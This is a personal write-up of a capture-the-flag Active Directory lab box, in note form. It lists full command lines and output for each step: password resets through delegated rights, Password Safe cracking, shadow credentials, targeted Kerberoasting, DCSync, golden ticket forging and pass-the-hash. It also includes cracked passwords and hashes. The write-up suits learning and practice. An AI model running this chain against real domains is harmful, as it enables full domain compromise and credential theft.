## External Authenticated Access - `olivia` We are given initial creds: `olivia:ichliebedich` - SMB - **Domain:** `administrator.htb` - **Machine:** `DC` - shares? -> yes - `SYSVOL` - `NETLOGON` -> juicy <3 - LDAP - users? -> yes - winrm -> yes We can authenticate via winrm. Let's authenticate locally using evil-winrm: ``` evil-winrm -i $RHOST -u $USER -p $PASS ``` ## Internal Authenticated Access - `olivia` - Bloodhound.py? -> yes - `bloodhound-ce-python -u $USER -p $PASS -d oscp.exam -ns $DC22_IP --dns-tcp -c all` Having a look at the Bloodhound graph reveals that `olivia` has [[GenericAll Permission - TODO]] on another user `michael`. `GenericAll`, also known as full control. This permission allows the trustee to manipulate the target object however they wish. Let's go ahead an reset his password. ``` net user michael password123! ``` Works out beautifully. ## Authenticated Internal Access - `michael` - SMB - shares - NETLOGON - ... - Bloodhound - `michael` has `ForceChangePassword` on `benjamin`. - we can set `benjamin`'s password and move laterally again. ```sh net user benjamin password123! /administrator.htb ``` Dosen't work... let's attempt to use #tool/powerview then... ```powershell upload powerview Import-Module .\powerview.ps1 Get-NetDomain ``` And then re-attempt the password change... ```powershell $SecPassword = ConvertTo-SecureString 'password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\michael', $SecPassword) $UserPassword = ConvertTo-SecureString 'password123!' -AsPlainText -Force Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword -Credential $Cred ``` Also access denied?? ```sh net rpc password "benjamin" "password123\!" -U "administrator.htb"/"michael"%"password123\!" -S "10.10.11.42" ``` ## Authenticated External Access - `benjamin` - SMB - nothing new - winrm -> nope - groups: - `Share Moderators` - could leverage [[Windows Runas - todo]] or something to start shell as this user - ftp? -> yes - files - `Backup.psafe3` - put? -> no - ### `Backup.psafe3` Some kind of encrypted database... https://pwsafe.org/ - made by the man, the myth, the legend, Bruce Schneider. Let's #x/cracking using #tool/john ``` ╭─[λ]-[admin.konstantinovitz.com]-[/targets/administrator/benjamin]-[10.10.11.42] ╰─> pwsafe2john.py Backup.psafe3 > Backup.hash ╭─[λ]-[admin.konstantinovitz.com]-[/targets/administrator/benjamin]-[10.10.11.42] ╰─> john --wordlist=/arsenal/wordlists/rockyou.txt Backup.hash Using default input encoding: UTF-8 Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x]) Cost 1 (iteration count) is 2048 for all loaded hashes Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status tekieromucho (Backu) ``` And we got a password: `tekieromucho`. Opening and decrypting the file using #app/passwordsafe we get a couple nice files: - `emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb` - `alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw` - `emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur` ``` UXLCI5iETUsIBoFVTj8yQFKoHjXmb UrkIbagoxMyUGw0aPlj9B0AXSea4Sw WwANQWnmJnGV07WQN8bMS7FMAbjNur ``` Let's append that to a file and spray it round a little.... We only seem to get a hit for: `emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb`... ## `emily` - smb -> nothing to see here - winrm? -> da - bloodhound? - groups? -> na - perms? ->`GenericWrite` on `ethan` ### Exploiting `GenericWrite` on `ethan` - We can either go: - [[AD Shadow Credentials - TODO]] or - [[Target Kerberoasting]] Let's attempt shadow credz: ```sh pywhisker.py -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target "ethan" --action "add" ``` ```sh targetedkerberoast.sh -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' ``` Kinda worked, but need to sync time: ```sh sudo ntpdate $RHOST ``` Giving the targetedkerberoast another shot and we get a hash. Which cracks to: `limpbizkit`. ## `ethan` - smb -> nothing to see - winrm -> nada - groups? - nothing intereting - outbound object control? - Has `DCSync` on domain controller -> WIN. ### `DCSync` Atttack ``` secretsdump.py 'administrator.htb'/'ethan':'limpbizkit'@'10.10.11.42' ``` Aaaand we get a massive dump here. Let's attempt a [[Golden Ticket - TODO]] ### [[Golden Ticket - TODO]] **Find the #AD/auth/NTLM for the #AD/account/krbtgt ** ``` # from secretsdump.py output krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6::: # this is the actual NT Hash 1181ba47d45fa2c76385a82409cbfaf6 ``` **Find/confirm Domain SID** ```sh lookupsid.py administrator.htb/ethan:[email protected] ... S-1-5-21-1088858960-373806567-254189436 ... ``` Next, leverage #tool/impacket/ticketer to forge the ticket for #AD/user/administrator: ```sh ticketer.py -nthash 1181ba47d45fa2c76385a82409cbfaf6 -domain-sid S-1-5-21-1088858960-373806567-254189436 -domain administrator.htb -user Administrator $RHOST ``` This will output a `10.10.11.42.ccache` file which may be used by #protocol/kerberos aware tools such as `smbclient` and `wmiexec`: ``` export KRB5CCNAME=10.10.11.42.ccache ``` Then have a go at some remote fun: ``` psexec.py -k -no-pass administrator.htb/[email protected] ``` Or just straight up connect as `Administrator` using his NT Hash: ``` # line from secretsdump output Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e::: # his NT Hash 3dc553ce4b9fd20bd016e098d2d2fd2e # connection evil-winrm -i $RHOST -u 'Administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e' ``` ## `Administrator` Aaand we're in: ``` *Evil-WinRM* PS C:\Users\Administrator\Desktop> ls Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 5/26/2025 11:23 AM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt e10ec86221ae1337db595cbbf1ac979a ``` ## Lessons Learned - Got #tool/powerview going for some more enum options - Learned about #protocol/smb/samba tooling `net` command. - Enumerate harder - Had to download a couple tools - Got some reps in using secretsdump - Learned about applying golden ticket attack - Need a windows machine to compile windows source tooling